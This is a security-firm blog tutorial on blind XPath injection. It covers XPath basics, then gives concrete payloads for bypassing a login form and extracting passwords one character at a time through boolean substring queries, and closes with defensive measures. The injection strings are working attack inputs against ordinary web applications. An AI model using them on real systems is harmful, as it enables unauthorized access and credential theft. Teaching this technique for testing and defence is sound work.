Blind XPath Injection – Approach for Unknown Data Sets

Blind XPath Injection

Approach for Unknown Data Sets

Andrea Hauser
by Andrea Hauser
time to read: 12 minutes

Keypoints

Use the extended attack possibilities of XPath injection

  • XPath means XML Path Language
  • XPath is used to query XML documents
  • An XPath Injection is similar to an SQL Injection
  • An XPath Injection allows entire XML documents to be read out

XML Path Language, XPath for short, is a query language for XML documents. This query language can be used to navigate through the elements and attributes of XML documents. To do this, the XML document is shown as a tree made up of nodes.

Basic principles

To explain the most important terms, we have provided a simple XML document below; this document forms the basis for the rest of the article.

<?xml version="1.0" encoding="UTF-8"?>
<accounts> <!-- root node -->
    <user id="1"> <!-- node with attribute -->
        <username> <!-- child of user node -->
            1337h4x0r <!-- node value -->
        </username>
        <firstname>Leet</firstname>
        <lastname>Hacker</lastname>
        <email>h@ck.er</email>
        <accounttype>normal</accounttype>
        <password>123456</password>
    </user>
    <user id="2">
        <username>johnnynormal</username>
        <firstname>John</firstname>
        <lastname>Doe</lastname>
        <email>john@company.com</email>
        <accounttype>administrator</accounttype>
        <password>UiobxmA5UcDVF9m5VAq</password>
    </user>
</accounts>

The XML document shown above corresponds approximately to the following tree:

display of the XML document as a tree

With XPath, the nodes in an XML document can be selected in various ways. The most important selection options here are:

XPath query Result of the XPath query
/accounts The root node accounts are selected.
//user All nodes with the name ‘user’ are selected.
/accounts/user All user nodes that are child nodes of the accounts node are selected.
/accounts/user[username=‘1337h4×0r’] The user node that includes the user name 1337h4×0r is returned. An absolute path starts with /.
//user[email=‘john@company.com’] The user node that includes the e-mail address john@company.com is returned. A relative path starts with //. This selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located.
/accounts/child::node() This selects all child nodes of the accounts node.
//user[position()=2] This selects the user node at this position. Warning: Since the index starts at 1, this selects the node of the user johnnynormal.

Blind XPath Injection

Now we have covered the most important basics of XML Path Language, I will provide step by step instructions for how to approach a Blind XPath Injection. Here we base our example on a login screen. The goal is to bypass this login screen to ultimately allow us to read out all users’ passwords.

Finding the Vulnerability

To determine the existence of an XPath Injection in principle, an apostrophe ' or a quotation mark " can be entered as the first character in the user name field. In the best-case scenario, an error message will be returned for one of these characters; this message would look something like this:

Warning: SimpleXMLElement::xpath(): Invalid predicate in /webserver/index.php on line 56

Warning: SimpleXMLElement::xpath(): xmlXPathEval: evaluation failed in /webserver/index.php on line 56

The appearance of this message or something similar unequivocally confirms that an XPath Injection in this section is the right approach.

Preparing for the Injection

In general, an XPath Injection uses a similar principle to an SQL injection. The point is to change an existing XPath query in such a way that it has the effect desired by the attacker.

Fortunately for the attacker, an XPath Injection – unlike an SQL injection – works in such a way that no access controls can be implemented within the XML document. Consequently, the entire XML document can be read out in the event of an XPath injection.

Furthermore, XPath is a standard query language; this means that different XPath dialects do not need to be dealt with. Only the fact that there are different XPath versions must be taken into account. At the moment, XPath 3.1 is the most current version. To determine the XPath version used, a function from version 2.0 or 3.1 that did not yet exist in the previous XPath version can be employed. If an error message stating this function does not exist is displayed, you can assume that you are dealing with an older XPath version.

In our example, I use the function lower-case("ABC"), which was not launched until version 2.0, to check the XPath version. Since the error message below is output in our example, it can be concluded that XPath 1.0 is being used.

"Warning : SimpleXMLElement::xpath() : xmlXPathCompOpEval : function lower-case not found in /webserver/index.php on line 56

Warning : SimpleXMLElement::xpath() : Unregistered function in /webserver/index.php on line 56

Warning : SimpleXMLElement::xpath() : Stack usage error in /webserver/index.php on line 56

Warning : SimpleXMLElement::xpath() : xmlXPathEval : 1 object left on the stack in /webserver/index.php on line 56"

Similar to the expression ' OR '1'='1 in an SQL Injection, ' or 1=1 or ''=' exists in an XPath Injection. As a result, evaluation of the condition bool_value_2 or password='...' can be bypassed during a query formed as 'bool_value_1 and bool_value_2', such as username='...' and password='...'.

Our example includes the input fields User name and Password. We enter the value ' or 1=1 or ''=' as the user name and the value bla as the password. If we assume the server logic below:

simplexml_load_file("useraccounts.xml")->xpath("/accounts/user[username=' " . $_POST["username"] . " ' and password=' " . $_POST["password"] . " ' ]");

the following XPath query is created:

xpath("/accounts/user[username='' or 1=1 or ''='' and password='bla' ]")

Due to the two successive or-statements, evaluation of the and-statement is bypassed. The result of the entry is that we are logged in as the first user of the XML document. We are logged in as the first user because the changed XPath query returns all users and the first user from this result is then used in each case.

Implementing the Attack

Now we have arrived at a state that permits us to perform a Boolean-Based Blind Injection. We can change the first or-statement and, if we are still logged in as the first user after this change, the or-statement is correct.

To continue this example in a logical manner, we assume that we can determine the password of the XML document’s first user. To do this, we can either change the password once we are logged in, or we could read it out from the user interface of the profile for the user who is logged in. Thus, for the rest of this example we assume that we know the password to be 123456.

Since we assume that the XML document has an unknown structure , the first task is to determine the node where the password is saved. Knowing this position within a user element is fundamental because we can only brute-force an unknown password if we are aware of the position. Here it is helpful to know the password of the user who is in first place.

I would now like to go through each step in the first or-query, which we need for the Blind XPath Injection:

  1. //user[position()=1]: This reads out the user who is in first place in the XML document. We should note here that the node name ‘user’ is a justified assumption. If we do not get any hits using this assumption, other terms similar to ‘user’ should be used.
  2. (//user[position()=1]/child::node()[position()=1]): The aim of this query is to read out the first child node of the first user. Applied to our sample XML document, this would be the username node.
  3. substring((//user[position()=1]/child::node()[position()=1]),1): Substring is defined as string substring(string_to_work_with, start_of_substring_extraction, [optional_length_of_extracted_string]). Applied to our sample XML, this means that the string is read out from the username node. Since no length is specified, the entire string 1337h4x0r is read out. Warning: In XPath, the index starts at 1,and not 0, as is otherwise customary in IT.
  4. substring((//user[position()=1]/child::node()[position()=1]),1)="123456": After the effective value of the first user’s first child node has been read out and determined to be 1337h4x0r, this value is compared to 123456. In this case, the comparison causes a false value. If this query is inserted as it is as our first or-value in the query ' or 1=1 or ''=', evaluation of this query does not lead to a successful login. We can then conclude that the first position of the user is not the password. To achieve a login in our sample XML, the query ' or substring((//user[position()=1]/child::node()[position()=6]),1)="123456" or ''=' is needed. This allows us to determine that the password is in position 6 in the user node.

Since we now know the position of the password, we can easily adjust the query to: ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="a" or ''='. This queries the first character of the password for the second user and compares that character with the letter 'a'. We manage this by specifying in the substring query how many characters from the start position are to be returned. Since we do not get a successful login with a comparison to 'a', we can conclude that the password of the second user does not start with a. It is not until we use ' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="U" or ''=' that we are successfully logged in as the first user of the XML document again. So, the first character of the password is the letter 'U'.

The only thing left to do is to increment the position of the selected substring and compare the characters again. ' or substring((//user[position()=2]/child::node()[position()=6]),2,1)="i" or ''=' gets us our second hit.

This type of comparison can be automated relatively easily, so readers are free to research this themselves if they so wish.

Protective Measures

To prevent an XPath Injection, pre-compiled XPath queries should be used if at all possible. If the selected library does not support these, a parameterized XPath interface should be used. If neither of these options is possible and a user’s input has to be embedded in a dynamic XPath query, the user input must be escaped. When escaping values, Whitelisting approaches should be used wherever possible.

Closing Remarks

In conclusion, I would like to note that this article focused solely on evaluating XPath 1.0. Compared to versions 2.0 and 3.1, XPath 1.0 has only a few functions, so reading out XML documents therefore requires a large number of queries. The expansions in XPath 2.0 and 3.1 have seen the addition of many functions that simplify reading out XML document, thus broadening the reach of an XPath Injection. For example, the function doc(path_to_xml_document) was added in XPath 2.0 and allows users to reference – and, as a result, read out – other XML documents. This allows users to read out config files with known memory locations, for instance.

About the Author

Andrea Hauser

Andrea Hauser graduated with a Bachelor of Science FHO in information technology at the University of Applied Sciences Rapperswil. She is focusing her offensive work on web application security testing and the realization of social engineering campaigns. Her research focus is creating and analyzing deepfakes. (ORCID 0000-0002-5161-8658)

You want to test your web application?

Our experts will get in contact with you!

×
Ways of attacking Generative AI

Ways of attacking Generative AI

Andrea Hauser

XML Injection

XML Injection

Andrea Hauser

Burp Macros

Burp Macros

Andrea Hauser

WebSocket Fuzzing

WebSocket Fuzzing

Andrea Hauser

You want more?

Further articles available here

You want to test your web application?

Our experts will get in contact with you!

You want more?

Further articles available here